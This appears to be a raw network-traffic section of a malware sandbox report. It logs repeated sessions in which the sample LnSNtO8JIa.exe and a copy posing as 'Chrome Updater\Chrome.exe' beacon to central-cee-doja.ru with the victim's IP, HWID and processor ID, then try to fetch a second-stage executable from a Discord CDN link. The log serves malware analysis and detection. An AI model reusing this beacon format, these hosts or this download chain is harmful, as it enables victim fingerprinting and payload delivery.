                                                                                    2024-01-04 07:30:56 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:56 UTC574INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X9hFnD7wHXpmzOXIE2XqcqvnueGTVLr9ucM7xQg7cc30yULJofZP2lv%2F2Uuty7sTso1ab4bSuaftQ1fG7EnWGZKMM8ix3AErJfwvBO%2BDcEnOtKGwHHftt0RmMInHYDoUcbhCsN1u"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c76d5f35582a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:56 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    114192.168.2.649837104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:56 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:56 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A9%2BI0OBuPgLcNMfXMo35So9oHf%2BlF%2Fm4OUvjp8H8v1QNXknsYVZV5cl3uBo0YKt5t%2B2HLrNNhkEK4%2BXvbIasewLu21rnSRp7e9ZGHiMDvCVyriopQo1rlSM5GTX2dnpYRiaNue1w"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c76d9d822d0c-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:56 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    115192.168.2.649838104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:56 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:57 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:57 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6lrYYqNLPNuEtV0lzXQQe79f%2FOSAgrgQ1mo4FCGtzN4KboL4t1yycdfon4uzm7sny7ruBARz3yFDgYbpdxZIwR3wj%2FdhFDdN32PiUD6XP2EeORQiu80WiC5U63mivgLQQA0L%2Fg%2FP"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c771aad707bc-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:57 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    116192.168.2.649839162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:56 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:57 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:57 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7731c7e2892-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 39
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:57 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=7PM9suzzwclKwupMseAtu4Rh6IUP4qOpludZ.1ScsIg-1704353457-1-AZ7W7RNY9d+jARDjFoqOtGdsPS5H/4mOTy4j8lFzr+yXpNfIC/vv3/AYERqMZf7Cr7Vj4qhbUqTfDGfCN9RqmnQ=; path=/; expires=Thu, 04-Jan-24 08:00:57 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Od%2FAPB4U3YgxwRvH3ql9OgQVmULGyNz6ar3xpTjZ7WwgEXsU6PAXmROook%2BSgTDk3EzUMmGFRdNcnxG8LICOP5oqt4gLc2I8xYhbCIO4L7JfqIU8TA2wRzrhS3K5pLbJOu%2BMlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=mJYQzaxLDbsbRzOsZpchSkBKVDdxOMX7MMxgLLQ9A5A-1704353457147-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:57 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
                                                                                    2024-01-04 07:30:57 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    117192.168.2.649840162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:57 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:57 UTC1347INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:57 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c775dd053b35-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 41
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:57 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=jFyIK4QoMbNPG6ETqlTgs2Y_nla7XhmJcONcrzHDgFk-1704353457-1-ASpYzZYsj00N4AveCOTLbBvlS3wUgi5NO37ybDFr2nocOwBu+B8hFDoZTCpgGqf2qJP3Go/nsFmgeHBTXTKBPrc=; path=/; expires=Thu, 04-Jan-24 08:00:57 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ahTSZgCCUwv2JDkB28LKZ0voGPustCLvNj%2Ftq%2Fa3%2FJte2EeI9niugLDZ%2FZCQRbcO%2FN2eLjnOhbF8K%2B%2FzBW%2BTWTtWGqtTmHsQiLzC2mTq61BfduqKmq9%2FKqjntBDim%2BDyzXRwjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=bMPrB9JpHO_Wk0RQT.ZK1urBk.PshQTjZRleQCf2wDM-1704353457614-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:57 UTC22INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e
                                                                                    Data Ascii: <?xml version='1.0' en
                                                                                    2024-01-04 07:30:57 UTC214INData Raw: 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: coding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    118192.168.2.649841104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:57 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:58 UTC586INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5%2F8wxU0kEwfMmCVG6y5etmLQCPXswklHooFp00JL7HgikdcQtkh%2BAXUScugjRwncyFTKrydQLLeyd%2F3kladhOE8iT2IldW%2FqeldA%2FS7GTg2GC3hfSgcPD%2FD1jk%2FjJLYmhcjoo5%2FF"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7769b94821a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:58 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    119192.168.2.649842104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:57 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:58 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LVfP3YKRJoJ%2FetOS%2BUlz4J6AyDlB3J0aHQqwSHZkCu%2FnM1kp7OGw9GPJOmP8JbXTdw%2FNWTBdKSFrYUC%2F8TwnT4K4uDzC3YpJZGqQaTVSYb6CTxgWIWRx8ZG4eKqoSQE4hWdJ4PcS"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7797c4f0774-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:58 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    120192.168.2.649843104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:58 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:58 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BJuagb0doePVlDUddCu5E%2FlvncxY4nbnHdtuC0QLRm%2F4hWdNoxSsvqQs0o2fckllRcostpgH2WXHBL44fnJ6ke%2FsfHgPOqCn7eK4VxDK%2FxbQaezkoT2Wu%2BhBxa0yQlMr8Husufz5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c77c3f57397c-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:58 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    121192.168.2.649844104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:58 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:59 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:59 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZvDUQ7FrHBblujms5T2O%2B5VMn9npfJ3RLHucn1q1HSXNM3trlFpqR7hcTNVgnSoyD2X4ogPg9yq%2BJ77GB5COV6HJA5TQlEt7teExAYLz6p877Crfn8e5pbxlBJi%2B8TOpCgY%2FnTDf"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c77def1a57be-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:59 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    122192.168.2.649845162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:59 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:59 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:59 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c780789e824e-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 32
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:59 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=MkWZc5ScCtCqECzdlXQYI.ZPsYOXPNcX5LC5s.dfAhQ-1704353459-1-Ad/z1EBJbkLp7miC+125UljwmRAhEzjtcvatuLdHm/avcP4HQGWu5Bl5S5NrD7xtHYavTeGYFxmVpQA+2sXQfiE=; path=/; expires=Thu, 04-Jan-24 08:00:59 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gh5qVXEJv1NwYq2w9V1cKKeyyWKMCfqQXX%2FWDVHgeRvpYHFXqogDM38m%2FH1jbF1A6kOinx4XP5FQ32%2BpHkg4ZqxlOGVnZqr8iOJ4ysYGWOwxOi6f5BiTndzetJLvQFlI4gVOLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=WO_L6KwiDc6cXwPamEI6On9G7obBRLQ.HmGOcws_UdE-1704353459293-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:59 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
                                                                                    2024-01-04 07:30:59 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    123192.168.2.649846162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:59 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:59 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:59 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c78259488220-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 32
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:59 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=6tSafKDDjOatgfZgZLes31koXsqBZEeno3LhVLg5kkQ-1704353459-1-AcvjEdf21u9E0018KGKwYM3eXJZPDZwC6T+KshQY9BUKL4cQxnEkEQja8ocUZoSLh2oI73uImRWsYsP9S6sodYI=; path=/; expires=Thu, 04-Jan-24 08:00:59 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GZ2tsPCrBwDDAtuVxi%2BA5XW7I3QVjiIzB9grB2y8TQHYUfqLCFMEf9sWsEfiImD70E%2B117q5hdXX8350aUgAEAjKFD8G516J8%2BE2uMNqSK7e1ocpOkEHiYiuTWHXkbD9RsTWCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=IZhHDEegTdl7nN65WYV1_ndpAtB3P6HK8QtM.ZY2pPc-1704353459598-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:59 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
                                                                                    2024-01-04 07:30:59 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    124192.168.2.649847104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
